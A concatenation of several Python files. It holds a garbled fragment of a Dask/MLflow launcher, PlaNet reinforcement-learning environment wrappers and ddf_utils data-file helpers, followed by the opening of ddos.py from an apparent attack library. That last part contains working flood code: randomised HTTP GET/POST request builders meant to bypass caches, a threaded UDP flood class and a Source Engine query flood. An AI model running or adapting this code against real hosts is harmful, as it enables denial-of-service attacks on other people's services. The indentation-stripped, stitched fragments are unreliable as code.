# Wait until process terminates (without using p.wait())
# while driver_proc.poll() is None:
# # Process hasn't exited yet, let's wait some
# time.sleep(0.5)
print("waiting for driver process to terminate")
driver_proc.wait()
exit_code = driver_proc.returncode
print("process ended with code", exit_code)
print("killing scheduler, worker and jupyter")
jupyter_proc.kill()
scheduler_proc.kill()
worker_proc.kill()
exit(exit_code)
export_png(ts.figure, filename="./outputs/plot_{rank}.png")
else:
flush(scheduler_proc, scheduler_log)
    # Processing on ranks other than 0
else:
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
flush(worker_proc, worker_log)
|
wrappers.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Environment wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import datetime
import io
import os
import sys
import traceback
import uuid
import gym
import gym.spaces
import numpy as np
import skimage.transform
import tensorflow as tf
from planet.tools import nested
class ObservationDict(object):
def __init__(self, env, key='observ'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: np.array(obs)}
return obs
class ConcatObservation(object):
"""Select observations from a dict space and concatenate them."""
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
spaces = [spaces[key] for key in self._keys]
low = np.concatenate([space.low for space in spaces], 0)
high = np.concatenate([space.high for space in spaces], 0)
dtypes = [space.dtype for space in spaces]
if not all(dtype == dtypes[0] for dtype in dtypes):
message = 'Spaces must have the same data type; are {}.'
raise KeyError(message.format(', '.join(str(x) for x in dtypes)))
return gym.spaces.Box(low, high, dtype=dtypes[0])
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = self._select_keys(obs)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = self._select_keys(obs)
return obs
def _select_keys(self, obs):
return np.concatenate([obs[key] for key in self._keys], 0)
class SelectObservations(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
return gym.spaces.Dict({key: spaces[key] for key in self._keys})
@property
def action_space(self):
return self._env.action_space
def step(self, action, *args, **kwargs):
obs, reward, done, info = self._env.step(action, *args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs, reward, done, info
def reset(self, *args, **kwargs):
obs = self._env.reset(*args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs
class PixelObservations(object):
def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self._env = env
self._size = size
self._dtype = dtype
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self._env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
image = self._env.render('rgb_array')
if image.shape[:2] != self._size:
kwargs = dict(
output_shape=self._size, mode='edge', order=1, preserve_range=True)
image = skimage.transform.resize(image, **kwargs).astype(image.dtype)
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class ObservationToRender(object):
def __init__(self, env, key='image'):
self._env = env
self._key = key
self._image = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return gym.spaces.Dict({})
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._image = obs.pop(self._key)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
self._image = obs.pop(self._key)
return obs
def render(self, *args, **kwargs):
return self._image
class OverwriteRender(object):
def __init__(self, env, render_fn):
self._env = env
self._render_fn = render_fn
self._env.render('rgb_array') # Set up viewer.
def __getattr__(self, name):
return getattr(self._env, name)
def render(self, *args, **kwargs):
return self._render_fn(self._env, *args, **kwargs)
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class NormalizeActions(object):
def __init__(self, env):
self._env = env
low, high = env.action_space.low, env.action_space.high
self._enabled = np.logical_and(np.isfinite(low), np.isfinite(high))
self._low = np.where(self._enabled, low, -np.ones_like(low))
self._high = np.where(self._enabled, high, np.ones_like(low))
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
space = self._env.action_space
low = np.where(self._enabled, -np.ones_like(space.low), space.low)
high = np.where(self._enabled, np.ones_like(space.high), space.high)
return gym.spaces.Box(low, high, dtype=space.dtype)
def step(self, action):
action = (action + 1) / 2 * (self._high - self._low) + self._low
return self._env.step(action)
class DeepMindWrapper(object):
"""Wraps a DM Control environment into a Gym interface."""
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, env, render_size=(64, 64), camera_id=0):
self._env = env
self._render_size = render_size
self._camera_id = camera_id
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
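# Minimal usage sketch for DeepMindWrapper (illustrative only): wrap a dm_control
# task so it can be driven through the Gym-style step/reset interface. Assumes
# dm_control is installed; the domain/task names below are just examples.
def _example_deepmind_wrapper():
  from dm_control import suite
  env = DeepMindWrapper(suite.load('cartpole', 'balance'), render_size=(64, 64))
  obs = env.reset()
  obs, reward, done, info = env.step(env.action_space.sample())
  return obs, reward, done, info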
class MaximumDuration(object):
"""Limits the episode to a given upper number of decision points."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class MinimumDuration(object):
"""Extends the episode to a given lower number of decision points."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step < self._duration:
done = False
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ProcessObservation(object):
def __init__(self, env, process_fn):
self._env = env
self._process_fn = process_fn
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return nested.map(
lambda box: gym.spaces.Box(
self._process_fn(box.low),
self._process_fn(box.high),
dtype=self._process_fn(box.low).dtype),
self._env.observation_space)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
class PadActions(object):
"""Pad action space to the largest action space."""
def __init__(self, env, spaces):
self._env = env
self._action_space = self._pad_box_space(spaces)
@property
def observation_space(self):
return self._env.observation_space
@property
def action_space(self):
return self._action_space
def step(self, action, *args, **kwargs):
action = action[:len(self._env.action_space.low)]
return self._env.step(action, *args, **kwargs)
def reset(self, *args, **kwargs):
return self._env.reset(*args, **kwargs)
def _pad_box_space(self, spaces):
assert all(len(space.low.shape) == 1 for space in spaces)
length = max(len(space.low) for space in spaces)
low, high = np.inf * np.ones(length), -np.inf * np.ones(length)
for space in spaces:
low[:len(space.low)] = np.minimum(space.low, low[:len(space.low)])
high[:len(space.high)] = np.maximum(space.high, high[:len(space.high)])
return gym.spaces.Box(low, high, dtype=np.float32)
class CollectGymDataset(object):
"""Collect transition tuples and store episodes as Numpy files.
  The time indices of the collected episode use the convention that at each
time step, the agent first decides on an action, and the environment then
returns the reward and observation.
This means the action causes the environment state and thus observation and
rewards at the same time step. A dynamics model can thus predict the sequence
of observations and rewards from the sequence of actions.
The first transition tuple contains the observation returned from resetting
the environment, together with zeros for the action and reward. Thus, the
episode length is one more than the number of decision points.
"""
def __init__(self, env, outdir):
self._env = env
self._outdir = outdir and os.path.expanduser(outdir)
self._episode = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
if kwargs.get('blocking', True):
transition = self._env.step(action, *args, **kwargs)
return self._process_step(action, *transition)
else:
future = self._env.step(action, *args, **kwargs)
return lambda: self._process_step(action, *future())
def reset(self, *args, **kwargs):
if kwargs.get('blocking', True):
observ = self._env.reset(*args, **kwargs)
return self._process_reset(observ)
else:
future = self._env.reset(*args, **kwargs)
return lambda: self._process_reset(future())
def _process_step(self, action, observ, reward, done, info):
transition = self._process_observ(observ).copy()
transition['action'] = action
transition['reward'] = reward
self._episode.append(transition)
if done:
episode = self._get_episode()
if self._outdir:
filename = self._get_filename()
self._write(episode, filename)
return observ, reward, done, info
def _process_reset(self, observ):
# Resetting the environment provides the observation for time step zero.
# The action and reward are not known for this time step, so we zero them.
transition = self._process_observ(observ).copy()
transition['action'] = np.zeros_like(self.action_space.low)
transition['reward'] = 0.0
self._episode = [transition]
return observ
def _process_observ(self, observ):
if not isinstance(observ, dict):
observ = {'observ': observ}
return observ
def _get_filename(self):
timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
identifier = str(uuid.uuid4()).replace('-', '')
filename = '{}-{}.npz'.format(timestamp, identifier)
filename = os.path.join(self._outdir, filename)
return filename
def _get_episode(self):
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: np.array(v) for k, v in episode.items()}
for key, sequence in episode.items():
if sequence.dtype == 'object':
message = "Sequence '{}' is not numeric:\n{}"
raise RuntimeError(message.format(key, sequence))
return episode
def _write(self, episode, filename):
if not tf.gfile.Exists(self._outdir):
tf.gfile.MakeDirs(self._outdir)
with io.BytesIO() as file_:
np.savez_compressed(file_, **episode)
file_.seek(0)
with tf.gfile.Open(filename, 'w') as ff:
ff.write(file_.read())
folder = os.path.basename(self._outdir)
name = os.path.splitext(os.path.basename(filename))[0]
print('Recorded episode {} to {}.'.format(name, folder))
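# Minimal usage sketch for CollectGymDataset (illustrative only): wrap an environment
# so that every finished episode is written to `outdir` as a compressed .npz file.
# The environment id and output directory below are just examples.
def _example_collect_episodes(outdir='/tmp/episodes', num_episodes=2):
  env = CollectGymDataset(gym.make('Pendulum-v0'), outdir)
  for _ in range(num_episodes):
    obs, done = env.reset(), False
    while not done:
      obs, reward, done, info = env.step(env.action_space.sample())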
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class Async(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor, strategy='thread'):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
if strategy == 'thread':
import multiprocessing.dummy as mp
elif strategy == 'process':
import multiprocessing as mp
else:
raise NotImplementedError(strategy)
self._conn, conn = mp.Pipe()
self._process = mp.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
try:
message, payload = self._conn.recv()
except OSError:
raise RuntimeError('Environment worker crashed.')
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
print('Error in environment process: {}'.format(stacktrace))
try:
conn.send((self._EXCEPTION, stacktrace))
except Exception:
print('Failed to send exception back to main process.')
try:
conn.close()
except Exception:
print('Failed to properly close connection.')
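# Illustrative usage of the process-based environment wrapper above, written as
# comments only. The class name `ExternalProcess`, the `gym` import and the
# environment id are assumptions (based on the upstream agents code this wrapper
# resembles) and are not defined in this file:
#
#   >>> import gym
#   >>> def make_env():
#   ...     return gym.make('CartPole-v1')
#   >>> env = ExternalProcess(make_env)
#   >>> obs = env.reset()                                    # blocking by default
#   >>> promise = env.step(env.action_space.sample(), blocking=False)
#   >>> obs, reward, done, info = promise()                  # resolve the promise later
#   >>> env.close()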
def get_repeat(task_str):
domain, _ = task_str.split('_')
if domain in ['walker', 'finger']:
repeat = 2
elif domain in ['cheetah', 'cup', 'reacher']:
repeat = 4
elif domain in ['cartpole']:
repeat = 8
else:
raise NotImplementedError('{} env cannot be found'.format(domain))
return repeat
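# Illustrative: get_repeat() expects '<domain>_<task>' task strings (dm_control-style),
# e.g. get_repeat('cheetah_run') -> 4 and get_repeat('walker_walk') -> 2.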
|
io.py
|
# -*- coding: utf-8 -*-
"""io functions for ddf files"""
import os
import shutil
import json
import threading
import time
import typing
from urllib.parse import urlsplit
from io import BytesIO
import pandas as pd
import requests as req
from ddf_utils.str import format_float_digits
from ddf_utils.package import get_datapackage
# helper for dumping datapackage json
def dump_json(path, obj):
"""convenient function to dump a dictionary object to json"""
with open(path, 'w+') as f:
json.dump(obj, f, ensure_ascii=False, indent=4)
f.close()
# TODO: integrate with Ingredient.serve
def serve_datapoint(df_: pd.DataFrame, out_dir, concept, copy=True,
by: typing.Iterable = None,
formatter: typing.Callable = format_float_digits, **kwargs):
"""save a pandas dataframe to datapoint file.
the file path of csv will be out_dir/ddf--datapoints--$concept--$by.csv
addition keyword arguments can be passed to `pd.DataFrame.to_csv()` function.
"""
if copy:
df = df_.copy()
else:
df = df_
# formatting the concept column
if formatter is not None:
df[concept] = df[concept].map(formatter)
if by is None:
by = df.index.names
by = '--'.join(by)
path = os.path.join(out_dir, 'ddf--datapoints--{}--by--{}.csv'.format(concept, by))
df.to_csv(path, **kwargs)
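# Illustrative usage (the dataframe below is a made-up example, not part of this module):
#
#   >>> df = pd.DataFrame({'geo': ['swe', 'nor'], 'time': [2000, 2000],
#   ...                    'population': [8872000.0, 4491000.0]}).set_index(['geo', 'time'])
#   >>> serve_datapoint(df, '.', 'population')
#   # writes ./ddf--datapoints--population--by--geo--time.csv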
def serve_concept():
pass
def serve_entity():
pass
def open_google_spreadsheet(docid):
"""read google spreadsheet into excel io object"""
tmpl_xls = "https://docs.google.com/spreadsheets/d/{docid}/export?format=xlsx&id={docid}"
url = tmpl_xls.format(docid=docid)
res = req.get(url)
if res.ok:
return BytesIO(res.content)
return None
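# Illustrative: the returned BytesIO can be handed straight to pandas, e.g.
#   >>> xls = open_google_spreadsheet('<spreadsheet docid>')
#   >>> sheets = pd.read_excel(xls, sheet_name=None) if xls is not None else {}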
def cleanup(path, how='ddf', exclude=None, use_default_exclude=True):
"""remove all ddf files in the given path"""
default_exclude = ['etl', 'lang', 'langsplit', 'datapackage.json', 'README.md', 'assets']
if exclude and not isinstance(exclude, list):
if isinstance(exclude, tuple):
            exclude = list(exclude)  # list() would split a str into characters; [exclude] would nest a tuple
else:
exclude = [exclude]
if use_default_exclude:
if exclude:
for e in default_exclude:
exclude.append(e)
else:
exclude = default_exclude
if how == 'ddf':
for f in os.listdir(path):
            # keep dot files and excluded entries; remove everything else
if f not in exclude and not f.startswith('.'):
p = os.path.join(path, f)
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.remove(p)
# TODO: think a best way to handle metadata in datapackage.json
# if os.path.exists(os.path.join(path, 'datapackage.json')):
# os.remove(os.path.join(path, 'datapackage.json'))
if how == 'lang':
if os.path.exists(os.path.join(path, 'lang')):
shutil.rmtree(os.path.join(path, 'lang'))
if how == 'langsplit':
if os.path.exists(os.path.join(path, 'langsplit')):
shutil.rmtree(os.path.join(path, 'langsplit'))
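# Illustrative: cleanup('/path/to/dataset') removes top-level ddf files and directories
# except dot files and the default excludes (etl/, lang/, langsplit/, datapackage.json,
# README.md, assets); how='lang' or how='langsplit' removes only that directory.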
def download_csv(urls, out_path):
"""download csv files"""
def download(url_, out_path_):
r = req.get(url_, stream=True)
        total_length = int(r.headers.get('content-length', 0))  # header may be absent
if total_length == 0:
return
fn = urlsplit(url_).path.split('/')[-1]
print('writing to: {}\n'.format(fn), end='')
with open(os.path.join(out_path, fn), 'wb') as fd:
for chunk in r.iter_content(chunk_size=128):
fd.write(chunk)
    def create_thread(url_, out_path_):
download_thread = threading.Thread(target=download, args=(url_, out_path_))
download_thread.start()
return download_thread
threads = []
for url in urls:
        threads.append(create_thread(url, out_path))
# wait until all downloads are done
is_alive = [t.is_alive() for t in threads]
while any(is_alive):
time.sleep(1)
is_alive = [t.is_alive() for t in threads]
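# Illustrative usage (the URL and output directory are placeholders):
#   >>> download_csv(['https://example.org/data/indicators--by--geo--time.csv'], './source')
# Each URL is fetched in its own thread and written to out_path under its basename.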
def csvs_to_ddf(files, out_path):
"""convert raw files to ddfcsv
Args
----
files: list
a list of file paths to build ddf csv
out_path: `str`
the directory to put the ddf dataset
"""
import re
from os.path import join
from ddf_utils.str import to_concept_id
concepts_df = pd.DataFrame([['name', 'Name', 'string']],
columns=['concept', 'name', 'concept_type'])
concepts_df = concepts_df.set_index('concept')
all_entities = dict()
pattern = r'indicators--by--([ 0-9a-zA-Z_-]*).csv'
for f in files:
data = pd.read_csv(f)
basename = os.path.basename(f)
keys = re.match(pattern, basename).groups()[0].split('--')
keys_alphanum = list(map(to_concept_id, keys))
        # check if there is a time column; assume the last key column is time.
try:
pd.to_datetime(data[keys[-1]], format='%Y')
        except (ValueError, pd.errors.OutOfBoundsDatetime):
has_time = False
else:
has_time = True
if has_time:
ent_keys = keys[:-1]
else:
ent_keys = keys
# set concept type
for col in data.columns:
concept = to_concept_id(col)
if col in keys:
if col in ent_keys:
t = 'entity_domain'
else:
t = 'time'
else:
t = 'measure'
concepts_df.loc[concept] = [col, t]
for ent in ent_keys:
ent_df = data[[ent]].drop_duplicates().copy()
ent_concept = to_concept_id(ent)
ent_df.columns = ['name']
ent_df[ent_concept] = ent_df.name.map(to_concept_id)
if ent_concept not in all_entities.keys():
all_entities[ent_concept] = ent_df
else:
all_entities[ent_concept] = pd.concat([all_entities[ent_concept], ent_df],
ignore_index=True)
data = data.set_index(keys)
for c in data:
# output datapoints
df = data[c].copy()
df = df.reset_index()
for k in keys[:-1]:
df[k] = df[k].map(to_concept_id)
df.columns = df.columns.map(to_concept_id)
(df.dropna()
.to_csv(join(out_path,
'ddf--datapoints--{}--by--{}.csv'.format(
to_concept_id(c), '--'.join(keys_alphanum))),
index=False))
# output concepts
concepts_df.to_csv(join(out_path, 'ddf--concepts.csv'))
# output entities
for c, df in all_entities.items():
df.to_csv(join(out_path, 'ddf--entities--{}.csv'.format(c)), index=False)
dp = get_datapackage(out_path, use_existing=False)
dump_json(os.path.join(out_path, 'datapackage.json'), dp)
return
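# Illustrative usage (file names are placeholders, but they must match the
# 'indicators--by--<key>--...' pattern assumed above):
#   >>> csvs_to_ddf(['source/indicators--by--geo--year.csv'], 'output_dir')
# This writes ddf--concepts.csv, ddf--entities--*.csv, ddf--datapoints--*.csv and a
# generated datapackage.json into output_dir.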
|
ddos.py
|
import requests,cfscrape,socks,os,sys,urllib,socket,random,time,threading,ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#import the dependencies for each python version
if sys.version_info < (3,0):
# Python 2.x
import httplib
import urllib2
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
else:
# Python 3.x
import http.client
httplib = http.client
import urllib.request
urllib2=urllib.request
from kamene.config import conf
conf.ipv6_enabled = False
from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
if os.path.isdir('/data/data')==True:
adr=True#the device is an android
if os.path.isdir('/data/data/com.termux/')==True:
termux=True#the application which runs the module is Termux
if ((termux==False) or (adr==False)):
from bane.swtch import *
def reorder_headers_randomly(s):
b=s.split('\r\n\r\n')[1]
a=s.split('\r\n\r\n')[0]
m=a.split('\r\n')[0]
c=a.split('\r\n')[1:]
random.shuffle(c)
return m+"\r\n"+"\r\n".join(c)+'\r\n\r\n'+b
def random_param():
a=random.randint(1,2)
if a==1:
return str(random.randint(1,1000))
else:
return random.choice(lis)
def setup_http_packet(target,ty,paths,post_field_min,post_field_max,post_min,post_max,cookie,user_agents):
pa=random.choice(paths)#bypassing cache engine
q=''
for i in range(random.randint(2,5)):
q+=random_param()+random_param()
p=''
for i in range(random.randint(2,5)):
p+=random_param()+random_param()
if '?' in pa:
jo='&'
else:
jo='?'
pa+=jo+q+"="+p
#setting random headers
for l in range(random.randint(1,5)):
ed=random.choice(ec)
oi=random.randint(1,3)
if oi==2:
gy=0
while gy<1:
df=random.choice(ec)
if df!=ed:
gy+=1
ed+=', '
ed+=df
l=random.choice(al)
for n in range(random.randint(0,5)):
l+=';q={},'.format(round(random.uniform(.1,1),1))+random.choice(al)
kl=random.randint(1,2)
ck=""
if cookie:
ck="Cookie: "+cookie+"\r\n"
if ty==1:
m='GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n'.format(pa,ck,random.choice(user_agents),random.choice(a),l,ed,random.choice(ac),random.randint(100,1000),random.choice(cc),(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),target)
else:
k=''
for _ in range(random.randint(post_field_min,post_field_max)):
k+=random.choice(lis)
j=''
for x in range(random.randint(post_min,post_max)):
j+=random.choice(lis)
par =k+'='+j
m= "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(pa,ck,random.choice(user_agents),l,random.randint(300,1000),len(par),(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),target,par)
return reorder_headers_randomly(m)
def get_public_dns(timeout=15):
try:
return (requests.get('https://public-dns.info/nameservers.txt',timeout=timeout).text).split('\n')
except:
return []
def reset():#reset all values
global counter
counter=0
global stop
stop=False
global coo
coo=False
global ual
ual=[]
global flag
flag=-1
global ier
ier=0
global pointer
pointer=0
global ue
ue=[]
'''
the following classes are for DoS attacks simulations with different tools that have been either originally written in
diffferent languages (Perl: slowloris and C: xerxes and slow_read attack...) and rewritten in python and other python tools that are PoC for
some vulnerabilities (slow post attacks, hulk) with some modifications that has improved their performance!!!
'''
class udp_flood:
def __init__(self,u,p=80,threads_daemon=True,interval=0.001,min_size=10,max_size=10,connection=True,duration=60,threads=1,limiting=True,logs=False):
self.target=u
self.port=p
self.interval=interval
self.min_size=min_size
self.max_size=max_size
self.connection=connection
self.duration=duration
self.limiting=limiting
self.logs=logs
self.stop=False
self.counter=0
self.start=time.time()
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
tm=time.time()
size=0
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
if self.connection==True:
s.connect((self.target,self.port))
msg=''
for x in range(random.randint(self.min_size,self.max_size)):
msg+=random.choice(lis)
if len(msg)>1400:
msg=msg[0:1400]#make sure all payloads' sizes are on the right range
s.sendto((msg.encode('utf-8')),(self.target,self.port))
size+=len(msg)
self.counter+=1
if((self.logs==True) and (int(time.time()-tm)==1)):
sys.stdout.write("\rPackets: {} | Bytes/s: {} ".format(self.counter,size))
sys.stdout.flush()
tm=time.time()
size=0
if self.limiting==True:
time.sleep(self.interval)
except:
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()#this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
return a
class vse_flood:
def __init__(self,u,p=80,threads_daemon=True,interval=0.001,connection=True,duration=60,threads=1,limiting=True,logs=False):
self.target=u
self.port=p
self.payload=b'\xff\xff\xff\xffTSource Engine Query\x00' # read more at https://developer.valvesoftware.com/wiki/Server_queries
self.interval=interval
self.connection=connection
self.duration=duration
self.limiting=limiting
self.logs=logs
self.stop=False
self.counter=0
self.start=time.time()
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
tm=time.time()
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
